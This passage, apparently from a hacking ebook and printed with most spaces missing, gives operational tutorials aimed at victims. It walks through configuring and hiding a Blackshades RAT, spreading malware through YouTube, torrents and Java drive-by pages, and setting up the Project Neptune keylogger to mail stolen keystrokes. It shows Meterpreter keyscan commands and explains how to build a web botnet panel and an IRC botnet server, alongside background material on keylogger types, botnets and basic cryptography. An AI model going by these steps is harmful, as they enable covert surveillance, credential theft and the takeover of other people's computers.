FirstofallweneedtocreateanAccountwhichcanbedonebynavigatingtothislink:https://freedns.afraid.org/signup/.Afteryousignedupyoucanstartcreatingyoursubdomain.Justclickon“Subdomains”.Thenyouneedtoclickon“Addasubdomain”.Nowyoucancreateyoursubdomain.
VPN
AttheVPNpartyouneedtodecide(again)ifyouwanttouseaVPNbehindyourDNSornot.Ifnot,youcanskipthispart.IcanrecommendtouseaVPN,becauseit“hides”yourrealIP.
PortForwarding
Step1:Openupacommandpromptandenter‘ipconfig’withoutqoutesandlookforthe label Default Gateway, and it should look something like 192.168.1.1 or192.168.1.254.
Step2:EnteritinyouraddressbarinyourbrowserandsignintoyourRouter.
Step3:Gototheport-forwardingpagewhichmaybeunderyourAdvancedSettingsorApplicationsettings.
Step 4: Once you’re there, add two open ports for your computer ip which is onipconfiglabeledasipv4.MakesureyouopenitasbothTCPandUDP.Nowyou’vesuccessfully opened your port. Don’t do anything yet. Because you need to followotherstepsinorderforyourporttobeuseful.
Settingitupfinally
Nowhere’sthething.EveryRAThasitsownbuilder.Mostoftheprocedureissamebuttheremaystillbesomeoptionsthatmightconfuseyou.Don’tworryit’sgoodtoexperimentwiththesebutbeforeyoustarttospreadyourserver,besurethatit’sworkingproperly.Let’sstartwithmypersonalfavoriteBlackshades.
Step1:Openclient.exetolaunchBlackshadesNETandthenyouareautomaticallyloggedintoBlackshadesClient.
Step2:Nowclick“CreateServer”tabandrightclickin“profilespane”andselect“Createnew”andenteraprofilenameforitandclickok.
Step3:TypeyourFreeDNSorDuckDNSaddressintothe“IP/DNS”area.
Step4:TypethePortsthatyouforwarded.Firstportas“Port”,secondportas“TransferPort”.
Step5:Nameanythingasyour“ServerID”,it’sjusttoidentifythevictim.Youdon’twant to disturb the “Encryption Key”. (Note: Encryption key feature has beendisabledonlatestversions.)
Step6:Enterthe“Filename”fortheserverthatwouldbecreated.Youcanuse“HideFile”featureifyouwantasilentexecutionoftheserverfile.
Step7:Selectthe“Installpath”fortheservertogetinstalled,either“Applicationdata”or“Tempdirectory”.
Step8:Selectthe“Installmode”fortheserverwhethertoInstall,Melt,ProtectProcess.
Step9:Youcansetthe“Delay”timefortheconnectionbetweenyourclientandtheserverhere.
Step10:Enter“HKCU”assomethingwhichappearslikeasystemname,forexample:WinNTanduse“Startup”featureonlyifyouwanttoservertoruneachtimethecomputerisrestarted.
Step11:Generate“ActiveX”ifyouhadselected“Startup”feature.
Step12:Generate“Mutex”fortheserverbyclicking“Generate”
Step13:Click“InfectUSB”ifyouwanttoinfectthevictim’sUSBwithyourvirus,select “Compress with UPX” if you want to compress your server size. Select“ChangeIcon”ifyouwanttochangetheicon.Select“CloneFileInformation”ifyouwanttoclonesomefile’sinformation.
Step14:Click“Save”tosaveyourprofileinformation.
Step15:Click“Build”tocreateyourserver.
Andthat’sit!
Howisitbeingdistributed?
Theseareentirelynotallthemethodsblackhathackersareusingtospreadtheirmaliciousfilesbutthisisjusttohelpyouinformaboutthebasicsofhowtheyspreadthem.
Youtube:InmyopinionthemostfamousandeasiestmethodisYoutube.Thisismainlydonetotargetaspecialgrouplikepeoplewithspecialaccounts.Anywayhere’showit’sdone.
1. Gotoyoutube.comandregisteranaccountifnotalreadydone.
2.Let’ssaywe’regoingtotargetsteamusers.Searchfor“steamhacks”oranythingyoulike,anddownloadthevideo.
3.Nowallyouneedistouploadbackthevideobutinthedescriptionyouhavetoensurethedownloadlinkisyouroriginalserver.Chancesarethatmostofthetimesomeonewilldownloadandrunyourmaliciousfileontheircomputerwithoutevenknowing.
Torrents:Yup,youhearditright.Torrentisnumber-onespreadingwebsitesforhackers.Mostofthe.exekeygens/cracksyoudownloadareprobablybindedwithmaliciousfiles.Soit’sbettertodoublecheckthesefiles.Here’showtheydoit.
1. DownloadatorrentprogramlikeBitTorrenthere:http://www.bittorrent.com.
2.InstallBitTorrentifnotalreadydone.
3.Gotofile->CreatenewTorrent
4.Lookforyourfileandselectit.Nowanewtorrentwithyourfilewillbecreated.
5.GotoafamoustorrentsitelikePiratebay.org
6.Uploadyournewtorrenttothesitewithadetaileddescription.
JavaDrive-by:JavaDrive-ByorJavaappletisconsideredasoneofthemostpopularandsuccessfulmethodsforcompromisingasystem.It’sPopularbecauseit’sveryeasytosetupanditaffectsalltheplatforms.AJavaDrive-ByisaJavaAppletthatiscodedinJavaandisputonawebsite.Oncethevictimviewstheclonedwebsiteapop-upboxwillappearsayingthathisjavaversionisoutofdate“clickrunto
update”UsuallythevictimclicksthinkingitgoingtoupdatehisJava,butinthebackgrounditwilldownloadaprogramofftheInternet.ThisprogramcanbeaKeyloggeroravirus,etc.
ChapterFour:Keylogger
WhatisaKeylogger?
Well ifyouhaveabsolutelynoideaaboutcomputerthenyoumightnotbefamiliarwiththeterm“keylogger”,butifyoudothenyoumighthavecomeacrossstoriesofthe great keylogger. Believe me it’s pretty useful if you know how to use it. Akeylogger is a type of surveillance software (considered to be either software orspyware) that has the capability to record every keystroke youmake to a log file,usuallyencrypted.Akeyloggerrecordercanrecordinstantmessages,e-mail,andanyinformationyou typeatany timeusingyourkeyboard.The log file createdby thekeyloggercanthenbesenttoaspecifiedreceiver.Somekeyloggerprogramswillalsorecordanye-mailaddressesyouuseandwebsiteURLsyouvisit.
Keyloggers,asasurveillancetool,areoftenusedbyemployerstoensureemployeesuseworkcomputers forbusinesspurposesonly.Unfortunately,keyloggerscanalsobeembeddedinspywareallowingyourinformationtobetransmittedtoanunknownthirdparty.
Keystrokelogging
Keystroke logging, often referred to as keylogging or keyboard capturing, is theactionofrecording(orlogging)thekeysstruckonakeyboard,typicallyinacovertmannersothatthepersonusingthekeyboardisunawarethattheiractionsarebeingmonitored. It has uses in the study of human–computer interaction. There arenumerous keylogging methods, ranging from hardware and software-basedapproachestoacousticanalysis.
Akeyloggerexampleofascreencapture,which holds potentially confidential andprivate information. The image belowholds the corresponding keylogger textresult.
KeyloggerApplications
Software-basedkeyloggers
Thesearecomputerprogramsdesigned toworkonthetargetcomputer’ssoftware.Keyloggersareusedin IT organizations to troubleshoot technicalproblems with computers and business networks.Other legal uses include family or business peopleusing them to monitor the network usage withouttheir users’ direct knowledge. However, maliciousindividualsmayusekeyloggersonpubliccomputers
tostealpasswordsorcreditcardinformation.
Fromatechnicalperspectivethereareseveralcategories:
●Hypervisor-based:Thekeyloggercantheoreticallyresideinamalwarehypervisorrunningunderneaththeoperating system,whichremainsuntouched. It effectivelybecomesavirtualmachine.BluePill isaconceptualexample.
● Kernel-based: A program on the machine obtains root access to hide itself in the OS and startsinterceptingkeystrokesthatpassthroughthekernel.Thismethodisdifficultbothtowriteandtocombat.Such keyloggers reside at the kernel level and are thus difficult to detect, especially for user-modeapplicationswhodon’t have root access.They are frequently implemented as rootkits that subvert theoperating systemkernelandgainunauthorizedaccess to thehardware,making themverypowerful.Akeyloggerusingthismethodcanactasakeyboarddevicedriverforexample,andthusgainaccesstoanyinformationtypedonthekeyboardasitgoestotheoperatingsystem.
●API-based:ThesekeyloggershookkeyboardAPIsinsidearunningapplication.Thekeyloggerregistersfor keystroke events, as if it was a normal piece of the application instead ofmalware. The keyloggerreceivesaneventeachtimetheuserpressesorreleasesakey.Thekeyloggersimplyrecordsit.
●Formgrabbingbased:Formgrabbing-basedkeyloggerslogwebformsubmissionsbyrecordingthewebbrowsingonsubmitevents.Thesehappenwhentheuserfinishesfillinginaformandsubmitsitusuallybyclickingabuttonorhittingenter.ThisrecordsformdatabeforeitispassedovertheInternet.
● Memory injectionbased:Memory Injection (MitB)-basedkeyloggersaltermemory tablesassociatedwiththebrowserandothersystemfunctionstoperformtheirloggingfunctions.Bypatchingthememorytablesorinjectingdirectlyintomemory,thistechniquecanbeusedbymalwareauthorswhoarelookingto bypass Windows UAC (User Account Control). The Zeus and Spyeye Trojans use this methodexclusively. Non-Windows systems have analogous protection mechanisms that need to be thwartedsomehowbythekeylogger.
●Packetanalyzers:ThisinvolvescapturingnetworktrafficassociatedwithHTTPPOSTeventstoretrieveunencrypted passwords. This ismademore difficult when connecting viaHTTPS, which is one of thereasonsHTTPSwasinvented.
● Remoteaccess softwarekeyloggers:Theseare local softwarekeyloggerswithanadded feature thatallows access to the locally recorded data from a remote location. Remote communication may beachievedusingoneofthesemethods:
1. Dataisuploadedtoawebsite,databaseoranFTPserver.
2.Dataisperiodicallyemailedtoapre-definedemailaddress.
3.Dataiswirelesslytransmittedbymeansofanattachedhardwaresystem.
4.ThesoftwareenablesaremotelogintothelocalmachinefromtheInternetorthelocalnetwork,fordatalogsstoredonthetargetmachinetobeaccessed.Most of these aren’t stopped byHTTPS encryption because that only protects data in transit betweencomputers;thisisathreatinyourowncomputer-theoneconnectedtothekeyboard.
Hardware-basedkeyloggers
Hardware-basedkeyloggersdonotdependuponanysoftwarebeinginstalledastheyexistatahardwarelevelinacomputersystem.
● Firmware-based:BIOS-levelfirmwarethathandleskeyboardeventscanbe
modifiedtorecordtheseeventsastheyareprocessed.Physicaland/orroot-levelaccessisrequiredtothemachine,andthesoftwareloadedintotheBIOSneedstobecreatedforthespecifichardwarethatitwillberunningon.
●Keyboardhardware:Hardwarekeyloggersareusedforkeystrokeloggingby
means of a hardware circuit that is attached somewhere in between thecomputer keyboard and the computer, typically in line with the keyboard’scableconnector.TherearealsoUSBconnectorsbasedHardwarekeyloggersaswellasonesforLaptopcomputers(theMini-PCIcardplugsintotheexpansionslot of a laptop). Stealthier implementations can be installed or built intostandard keyboards, so that no device is visible on the external cable. Bothtypes log all keyboard activity to their internal memory, which can besubsequently accessed, for example, by typing in a secret key sequence. Ahardware keylogger has an advantage over a software solution: it is notdependent on being installed on the target computer’s operating system andthereforewillnotinterferewithanyprogramrunningonthetargetmachineor
bedetectedbyanysoftware.Howeveritsphysicalpresencemaybedetectedif,for example, it is installed outside the case as an inline device between thecomputerandthekeyboard.Someoftheseimplementationshavetheabilitytobe controlledandmonitored remotelybymeansof awireless communication
standard.
●Wirelesskeyboardsniffers:Thesepassivesnifferscollect
packets of data being transferred fromawirelesskeyboard and its receiver. As encryptionmay beused to secure the wireless communicationsbetween the two devices, this may need to becrackedbeforehand if the transmissionsare tobe
read.
●Keyboardoverlays:Criminalshavebeenknowntousekeyboardoverlayson
ATMstocapturepeople’sPINs.EachkeypressisregisteredbythekeyboardoftheATMaswellasthecriminal’skeypadthat isplacedover it.Thedevice isdesignedtolooklikeanintegratedpartofthemachinesothatbankcustomersareunawareofitspresence.
●Acoustickeyloggers:Acousticcryptanalysiscanbeusedtomonitorthesound
createdbysomeonetypingonacomputer.Eachkeyonthekeyboardmakesasubtlydifferent acoustic signaturewhen struck. It is thenpossible to identifywhich keystroke signature relates towhich keyboard character via statisticalmethods such as frequency analysis. The repetition frequency of similaracoustickeystroke signatures, the timingsbetweendifferentkeyboard strokesandothercontextinformationsuchastheprobablelanguageinwhichtheuseriswritingareused in thisanalysis tomapsounds to letters.[14]A fairly longrecording(1000ormorekeystrokes)isrequiredsothatabigenoughsampleiscollected.
● Electromagnetic emissions: It is possible to capture the electromagnetic
emissionsofawiredkeyboardfromupto20metres(66ft)away,withoutbeingphysicallywiredtoit.In2009,Swissresearcherstested11differentUSB,PS/2and laptop keyboards in a semi-anechoic chamber and found them allvulnerable,primarilybecauseoftheprohibitivecostofaddingshieldingduring
manufacture. The researchers used a wide-band receiver to tune into thespecificfrequencyoftheemissionsradiatedfromthekeyboards.
● Optical surveillance: Optical surveillance, while not a keylogger in the
classical sense, is nonetheless an approach that can be used to capturepasswordsorPINs.Astrategicallyplacedcamera,suchasahiddensurveillancecamera at anATM, can allow a criminal towatch a PIN or password beingentered.
●Physicalevidence:Forakeypadthatisusedonlytoenterasecuritycode,the
keyswhichareinactualusewillhaveevidenceofusefrommanyfingerprints.Apasscodeof fourdigits, if the fourdigits inquestionareknown, is reducedfrom10,000possibilities to just24possibilities (104versus4! (factorialof4)).These could then be used on separate occasions for a manual “brute forceattack”.
● Smartphonesensors:Researchers have demonstrated that it is possible to
capture the keystrokes of nearby computer keyboards using only thecommodity accelerometer found in smartphones.Theattack ismadepossibleby placing a smartphone nearby a keyboard on the same desk. Thesmartphone’saccelerometercanthendetectthevibrationscreatedbytypingonthe keyboard, and then translate this raw accelerometer signal into readablesentenceswithasmuchas80percentaccuracy.
HowtosetupKeyloggerFor this we will be using the famous ProjectNeptune keylogger. Project Neptune is known tobe one of the easiest Keylogger for MicrosoftWindows operating systems. This software iscompletely undetectable once installed, Even toantiviruses.Anotherusefulfeatureofthissoftwareis that it can send you the logs (recordedkeystrokes) to your e-mail address. All this willhappenandyourvictimwouldnotknowaboutit.
Again, I am not responsible for any damage you cause, this is for educationalpurposeonly.
Step1:Downloadthesoftwarefromitsofficialwebsiteandsaveitonyourdisk.
Step2:Once it’sdownloaded, extract the folder towhereveryouwantandopen itup.ThenopentheProjectNeptune.exe.
Step 3:Configure the software. Open the software and come to the “Keystrokes”menu.NowI’musingemailtoreceivethelogs,youcanuseFTPifyouwantto.
Step 4: After configuring Keystrokes click on System Wide. Once you’re in theSystemWidemenu,checktherequiredoptionsasperyourrequirements,ItwouldbeagoodideatokeepthelevelLoworNon-existent.
Step 5: InstallationMenu: This menu will define the behavior of the software. Itwouldbeagoodideatosettheinstallationdirectorytosystemfolders.Youcanalsobindtheprogramtoafile,wewillskipthisoption.
Step 6: Skip to ServerCreation menu. In the server settings I would recommendputting something here if youwant tomake it less suspicious. Put something thatwouldmake it look like the original program. Don’t check “Copy File’s CreationDate”or“UseFileIcon”unlessyouhavethepremiumversion.Inthefilepumpingsection I would increase it by 1000+ kb to make it less suspicious. In the servergeneration tab,where it says“MutualExclusion (Mutex)String”after thathit the
refresh button. There it says automated cure password you can use the refreshbuttonoryoucantypeinapasswordofyourchoice.Then,keeptheprocessnameas“iexplorer.exe”.ThenhittheGenerateNewServerbuttonanditwillcreateaserverforyou.
Step7:AllSet.Nowallyouneedtodoistorunitonyourvictim’scomputer.
RemotelyinstallingKeyloggerusingMeterpreter
This can be done only once you’ve successfully installed Metasploit’s powerfullistener/rootkitonthetargetsystem.ItisexplainedinChapter:,Section:.
Step1:MigratetheMeterpreter
Beforewestartourkeylogger,weneedtomigratetheMeterpretertotheapplicationorprocesswewanttologthekeystrokesfrom.Let’schecktoseewhatprocessesarerunningonthevictimsystembytyping:meterpreter>ps
Noticeinthescreenshotthatwehavealistingofeveryprocessrunningonthevictimsystem.Wecanseeabout1/3ofthewaydowntheprocesslistingwithaProcessID(PID)of912,theNotepadapplicationisopenandrunning.
Let’s migrate to that process and capture any keystrokes entered there. Type:meterpreter > migrate 912. You can see from the screenshot that Meterpreterrespondsthatwehavemigratedsuccessfully,
Step2:StarttheKeylogger
Now that we have migrated the Meterpreter to the Notepad, we can embed thekeylogger.Metasploit’sMeterpreterhasabuilt-insoftwarekeyloggercalledkeyscan.To start it on the victim system, just type: meterpreter> keyscan_start. With thiscommand, Meterpreter will now start logging every keystroke entered into theNotepadapplication.
Step3:RecovertheKeystrokes
Now,let’sgobacktooursystemwithMeterpreterrunningonMetasploit.Wecannowdumpallofthekeystrokesthatwereenteredontarget’scomputer.Wesimplytype:meterpreter>keyscan_dump
ChapterFive:BotnetsandIRCBots
UnderstandingBotnetsandIRCBotsA botnet is a number of Internet-connectedcomputers communicating with other similarmachinesinanefforttocompleterepetitivetasksand objectives. This can be as mundane askeepingcontrolofanInternetRelayChat(IRC)channel,or itcouldbeusedtosendspamemailor participate in distributed denial-of-serviceattacks.Thewordbotnetisacombinationofthe
words robot and network. The term is usually used with a negative or maliciousconnotation.
Computersthatarecooptedtoserveinazombiearmyareoftenthosewhoseownersfail to provide effective firewalls and other safeguards. An increasing number ofhome users have high speed connections for computers that may be inadequatelyprotected.Azombieorbot isoftencreated throughanInternetport thathasbeenleft open and throughwhich a small Trojan horse program can be left for futureactivation.Atacertaintime,thezombiearmy“controller”canunleashtheeffectsofthe army by sending a single command, possibly from an InternetRelayChannel(IRC)site.
Thecomputersthatformabotnetcanbeprogrammedtoredirecttransmissionstoaspecificcomputer,suchasaWebsitethatcanbecloseddownbyhavingtohandletoomuchtraffic-adistributeddenial-of-service(DDoS)attack-or,inthecaseofspamdistribution,tomanycomputers.ThemotivationforazombiemasterwhocreatesaDDoS attackmay be to cripple a competitor. Themotivation for a zombiemastersending spam is in the money to be made. Both of them rely on unprotectedcomputersthatcanbeturnedintozombies.
TypesofBotnets
Legalbotnets
The termbotnet iswidely usedwhen several IRCbots have been linked andmaypossiblysetchannelmodesonotherbotsanduserswhilekeepingIRCchannelsfreefromunwantedusers.Thisiswherethetermisoriginallyfrom,sincethefirstillegalbotnetsweresimilartolegalbotnets.AcommonbotusedtosetupbotnetsonIRCiseggdrop.
Illegalbotnets
Botnets sometimes compromise computers whose security defenses have beenbreached and control conceded to a third party. Each such compromised device,known as a “bot”, is created when a computer is penetrated by software from amalware (malicioussoftware)distribution.However, itcouldalsobesomeone (oraspider) that hacks into a computer.The controller of a botnet is able to direct theactivitiesofthesecompromisedcomputersthroughcommunicationchannelsformedbystandards-basednetworkprotocolssuchasIRCandHypertextTransferProtocol(HTTP).Botnetsareincreasinglyrentedoutbycybercriminalsascommoditiesforavarietyofpurposes.
FormationofBotnet/IRCBots
Thisexampleillustrateshowabotnetiscreatedandusedtosendemailspam.
●Abotnetoperatorsendsoutvirusesorworms,infectingordinaryusers’computers,whosepayloadisamaliciousapplication—thebot.
●ThebotontheinfectedPClogsintoaparticularC&Cserver.
●Aspammerpurchasestheservicesofthebotnetfromtheoperator.
●Thespammerprovidesthespammessagestotheoperator,whoinstructsthecompromisedmachinesviathecontrolpanelonthewebserver,causingthemtosendoutspammessages.
Botnetscanbeexploitedforvariousotherpurposes,includingdenial-of-serviceattacks,creationormisuseofSMTPmailrelaysforspam,clickfraud,miningbitcoins,spamdexing,andthetheftofapplicationserialnumbers,loginIDs,andfinancialinformationsuchascreditcardnumbers.
Thebotnetcontrollercommunityfeaturesaconstantandcontinuousstruggleoverwhohasthemostbots,thehighestoverallbandwidth,andthemost“high-quality”infectedmachines,likeuniversity,corporate,andevengovernmentmachines.
Typesofattacks
1. Indistributeddenial-of-serviceattacks,multiplesystemssubmitasmanyrequestsaspossibletoasingleInternetcomputerorservice,overloadingitandpreventingitfromservicinglegitimaterequests.Anexampleisanattackonavictim’sphonenumber.Thevictimisbombardedwithphonecallsbythebots,attemptingtoconnecttotheInternet.
2.Adwareadvertisesacommercialofferingactivelyandwithouttheuser’spermissionorawareness,forexamplebyreplacingbanneradsonwebpageswiththoseofanotheradvertiser.
3.Spywareissoftwarewhichsendsinformationtoitscreatorsaboutauser’sactivities–typicallypasswords,creditcardnumbersandotherinformationthatcanbesoldontheblackmarket.Compromisedmachinesthatarelocatedwithinacorporatenetworkcanbeworthmoretothebotherder,astheycanoftengainaccesstoconfidentialcorporateinformation.Severaltargetedattacksonlargecorporationsaimedtostealsensitiveinformation,suchastheAurorabotnet.
4.E-mailspamaree-mailmessagesdisguisedasmessagesfrompeople,butareeitheradvertising,annoying,ormalicious.
5.Clickfraudoccurswhentheuser’scomputervisitswebsiteswithouttheuser’sawarenesstocreatefalsewebtrafficforpersonalorcommercialgain.
6.FastfluxisaDNStechniqueusedbybotnetstohidephishingandmalwaredeliverysitesbehindanever-changingnetworkofcompromisedhostsactingasproxies.
7.Brute-forcingremotemachinesservicessuchasFTP,SMTPandSSH.
8.Worms.Thebotnetfocusesonrecruitingotherhosts.
9.Scarewareissoftwarethatismarketedbycreatingfearinusers.Onceinstalled,itcaninstallmalwareandrecruitthehostintoabotnet.Forexample,userscanbeinducedtobuyarogueanti-virustoregainaccesstotheircomputer.
10.Exploitingsystemsbyobservingusersplayingonlinegamessuchaspokerandseetheplayers’cards.
HowtosetupBotnet
Beforeyoustarttosetupyourfirstbotnet,therearesomethingsyouneedtoknow:
●ABotnetisaPanelthatcankeepmanyComputersconnectedtoit.
●TheComputersconnectedtoitiscalledBots.
●ThebotswillbeunderyourCommandsoyouwillbeabletocommandthemtodothingsandtheywilldoit.
●Youwillneedawebsiteplushosting.
Alright let’s start.For this tutorial Iwillbeusinga simplebotnet called“Botnet”.It’s free sodon’tworry.Therearemoreadvancedandstablebotnetsavailableouttherebuttheycost,dependingontheirfunctionality.
Step1:Extractthebotnetfilesandthenopenupthefolder“Panel”.Findconfig.phpandeditit.
Step2:Nowgotoyourweb-hostandaddSQLDBandUser.Whenyouaredonewiththatuploadthe.sqltoyoursqlDBfromtheFolder“SQL”.
Step3:EdittheSQLConnectioninfoinconfig.php.Savewhenfinished.
Step 4: Upload everything in the folder “Panel” to your web-host. Now close thefolder,etc.
Step5:Gotoyourwebsite.LogintoyourBotnetwiththepasswordinconfig.php.
Step6:Go back to the folder “Botnet” and open upBuild.exe.Then type in yourDomainName (eg;www.site.com) and the Path. Build the file and run it on yourtarget’scomputer.If itcomes inthewebpanel, thencongratulation.Yourbotnet isfullyfunctional.
HowtosetupIRCBotnet?
Thiswillbea littlecomplicated ifyou’renewtobotnetsandIRCbut ifyoufollowthesestepsproperlyitwillbeanoproblem.
Requirements:YouneedaCentos5or6LinuxVPS[32bitor64bit].YoumaybuyanoffshoreLinuxVPStoavoidquicksuspension.
Step1:Firstofall,youneedaSSHclientlikePutty.Google“Putty”youwillfinditprettyeasily.It’sfreeaswell.Onceyouhavedownloadedit,openputtyandentertheVPSIPinhostnameorIPaddressandhitopen.
Step2:Nowtyperootthenpressenter.NowentertherootpasswordyoureceivedfromyourVPScompany.Rememberyoucan’tseeanythingwhiletypingthepasswordsowriteitproperlyandhitenteryoushouldbeabletologin.Nowjustcopyandpastecommandasfollow:
yumupdate,hitenterandthentypeagain,yuminstallgccgcc-c++kernel-devel
●Nowtype:wgethttps://www.unrealircd.org/downloads/Unreal3.2.10.4.tar.gz
●Nowtype:tarzxvfUnreal3.2.10.4.tar.gz
●Nowtype:cdUnreal3.2.10.4
●Nowtype:chmod777Config
Nowdoasfollow:
Type: ./Config,hitenter.Justholdenter throughall thisreadme.Then itwill startaskingquestions,youdon’tneedtochangeanythingexceptforonevalue.
●HowmanyfiledescriptorscantheIRCduse?Enter12000
●Nowtype:make
Nowtype:yuminstallnanoNowtype:nano/usr/include/bits/typesizes.h
●Change#define__FD_SETSIZE1024tothis,#define__FD_SETSIZE12000
● NowholdCtrlandpressX.TypeYandpressenter.Youshouldbacktotheconsolewindownow.
●Nowtype:nano/etc/security/limits.conf
Nowthatweareinthere,scrollallthewaydownbyusingthearrowkeys.
●Onceyouaredownthere,typeroothardnofile12000&rootsoftnofile12000
●NowholdCtrlandpressX.TypeYandpressenter.
●Nowyouneedtoexittheputtyandre-signintoyourrootaccount.
●Nowtypeulimit-n.Andifallgoeswellthenyouwillseethenumberyouputinputtyinthelimits.conffile.
●Uploadtheunrealircd.conffile,andtype./unrealstart
●Downloadunrealircd.conffromhttp://ge.tt/1VuH1l72/v/0
●Nowopenthe.Conffileusingnotepadornotepad++.
● NowholdCtrlandpressF.TypeAVandpressenter.Youmaychangeittoanything you like. And again do the same and type anything you like. Andchangeittoanythingforyouroperpassword.Nowsaveitanduploadtoyourvpsinsideunreal.Doasfollow.
● First download Winscp. You can download it from:http://winscp.net/download/winscp556setup.exe
●NowlogintoyourrootaccountusingWinscpasfollow:
●OpentheUnreal3.2.10.4folderandtransfertheeditedunrealircd.conf.WearealmostdonesettinguptheIRCDserver.
●NowclosetheWinscpandtypeinyourputtyconsole:cdUnreal3.2.10.4
●Nowtype:./unrealstart.That’sall.
NowyourIRCDserverisreadytousewithanyIRCBotnet.DownloadanyIRCclientlikemIRCtoconnectwithyourserver.
ChapterSix:Cryptography,Encryption,andDecryption
UnderstandingCryptography
Cryptography is where security engineeringmeetsmathematics.Itprovidesuswiththetoolsthatunderliemostmodernsecurityprotocols.Itis probably the key enabling technology forprotecting distributed systems, yet it issurprisinglyhardtodoright.Cryptographyhasoftenbeenused toprotect thewrong things, orusedtoprotecttheminthewrongway.We’llseeplentymore exampleswhenwe start looking in
detailatrealapplications.
Unfortunately,thecomputersecurityandcryptologycommunitieshavedriftedapartoverthelast20years.Securitypeopledon’talwaysunderstandtheavailablecryptotools,andcryptopeopledon’talwaysunderstandthereal-worldproblems.Thereareanumberofreasonsforthis,suchasdifferentprofessionalbackgrounds(computerscienceormathematics)anddifferentresearch funding (governmentshave tried topromotecomputersecurityresearchwhilesuppressingcryptography).
Thischapter isaimedatpeoplewithouta training incryptology;cryptologistswillfindlittleinitwhichtheydon’talreadyknow.AsIonlyhaveafewdozenpages,andaproperexpositionofmoderncryptographywouldrun into thousands, Iwon’tgointomuchofthemathematics(thereareplentybooksthatdothat).I’lljustexplainthebasic intuitionsandconstructions. Ifyouhave tousecryptography inanythingresemblinganovelway,thenIstronglyrecommendthatyoureadalotmoreaboutit.Computer security people often ask for non-mathematical definitions ofcryptographicterms.Thebasicterminologyisthatcryptographyreferstothescienceandartofdesigningciphers;cryptanalysistothescienceandartofbreakingthem;whilecryptology,oftenshortenedtojustcrypto,isthestudyofboth.Theinputtoanencryptionprocess iscommonlycalled theplaintext,andtheoutput theciphertext.Thereafter, things get somewhat more complicated. There are a number ofcryptographic primitives—basic building blocks, such as block ciphers, streamciphers, and hash functions. Block ciphers may either have one key for bothencryptionanddecryption,inwhichcasethey’recalledsharedkey(alsosecretkeyorsymmetric), or have separate keys for encryption and decryption, in which casethey’recalledpublickeyorasymmetric.Adigitalsignatureschemeisaspecialtypeof asymmetric crypto primitive. In the rest of this chapter, I will first give somesimple historical examples to illustrate the basic concepts. Finally, I’ll show howsomeofthemoreimportantcryptographicalgorithmsactuallywork,andhowthey
canbeusedtoprotectdata.
HistoricalBackground(Cryptography)
SuetoniustellsusthatJuliusCaesarencipheredhisdispatchesbywritingDforA,Efor B and so on. When Augustus Caesar ascended the throne, he changed theimperial cipher system so that C was now written for A, D for B, and so on. Inmodernterminology,wewouldsaythathechangedthekeyfromDtoC.TheArabsgeneralizedthisideatothemono-alphabeticsubstitution,inwhichakeywordisusedtopermutethecipheralphabet.Wewillwritetheplaintextinlowercaseletters,andthe cipher text in uppercase. CYAN RWSGKFR AN AH RHTFANY MSOYRMOYSHSMSEACNCMAKO;butbreakingciphersofthiskindisastraightforwardpencilandpaperpuzzle,whichyoumayhavedone inprimaryschool.The trick isthatsomeletters,andcombinationsofletters,aremuchmorecommonthanothers;inEnglish themost common letters are e, t, a, i, o, n, s, h, r, d, l, u in that order.Artificial intelligence researchershave shownsome interest inwritingprograms tosolve mono-alphabetic substitutions; using letter and digraph (letter-pair)frequenciesalone.Theytypicallysucceedwithabout600lettersofciphertext,while-smarterstrategies,suchasguessingprobablewords,cancutthistoabout150letters.Ahumancryptanalystwillusuallyrequiremuchless.
Anotherexampleofcryptography is substitutioncipheror simple substitution.Forexample,
(Imagetakenfromecee.colorado.edu)
DataEncryptionandDecryption
Difference is thatencryptionis theprocessoftranslatingplaintextdata(plaintext)intosomethingthatappearstoberandomandmeaningless(ciphertext).Decryptionistheprocessofconvertingciphertextbacktoplaintext.
To encrypt more than a small amount of data, symmetric encryption is used. Asymmetric key is used during both the encryption and decryption processes. Todecryptaparticularpieceof ciphertext, thekey thatwasused to encrypt thedatamustbeused.
Thegoalofeveryencryptionalgorithmistomakeitasdifficultaspossibletodecryptthegeneratedciphertextwithoutusingthekey.Ifareallygoodencryptionalgorithmis used, there is no technique significantly better than methodically trying everypossible key. For such an algorithm, the longer the key, themore difficult it is todecryptapieceofciphertextwithoutpossessingthekey.
It is difficult todetermine thequality of an encryptionalgorithm.Algorithms thatlookpromisingsometimesturnouttobeveryeasytobreak,giventheproperattack.Whenselectinganencryptionalgorithm,itisagoodideatochooseonethathasbeeninuseforseveralyearsandhassuccessfullyresistedallattacks.
SymmetricandAsymmetricEncryption
There are two basic techniques for encrypting information: symmetric encryption(alsocalledsecretkeyencryption)andasymmetricencryption(alsocalledpublickeyencryption.)
SymmetricEncryption
Symmetric encryption is the oldest andbest-known technique.A secret key,whichcanbeanumber,aword,orjustastringofrandomletters,isappliedtothetextofamessagetochangethecontentinaparticularway.Thismightbeassimpleasshiftingeach letter by a number of places in the alphabet. As long as both sender andrecipientknowthesecretkey,theycanencryptanddecryptallmessagesthatusethiskey.
“The keys, in practice, represent a shared secret between two or more parties that can be used tomaintainaprivate information link.Thisrequirement thatbothpartieshaveaccess to thesecretkey isone of themain drawbacks of symmetric key encryption, in comparison to public-key encryption.”-Wikipedia(Symmetric-keyalgorithm)
Typesofsymmetric-keyalgorithms:
Symmetric-keyencryptioncanuseeitherstreamciphersorblockciphers.
●Streamciphersencryptthedigits(typicallybytes)ofamessageoneatatime.
● Block ciphers take a number of bits and encrypt them as a single unit,paddingtheplaintextsothatitisamultipleoftheblocksize.Blocksof64bitshave been commonly used. The Advanced Encryption Standard (AES)algorithmapprovedbyNISTinDecember2001uses128-bitblocks.
AsymmetricEncryption
The problem with secret keys is exchanging them over the Internet or a largenetwork while preventing them from falling into the wrong hands. Anyone whoknowsthesecretkeycandecryptthemessage.Oneanswerisasymmetricencryption,inwhichtherearetworelatedkeys—akeypair.Apublickeyismadefreelyavailableto anyone who might want to send you a message. A second, private key is keptsecret,sothatonlyyouknowit.
“Thestrengthliesinthe“impossibility”(computationalimpracticality)foraproperlygeneratedprivatekeytobedeterminedfromitscorrespondingpublickey.Thusthepublickeymaybepublishedwithoutcompromisingsecurity.Securitydependsonlyonkeepingtheprivatekeyprivate.Publickeyalgorithms,unlikesymmetrickeyalgorithms,donotrequireasecurechannelfortheinitialexchangeofone(ormore)secretkeysbetweentheparties.”-Wikipedia(Public-keycryptography)
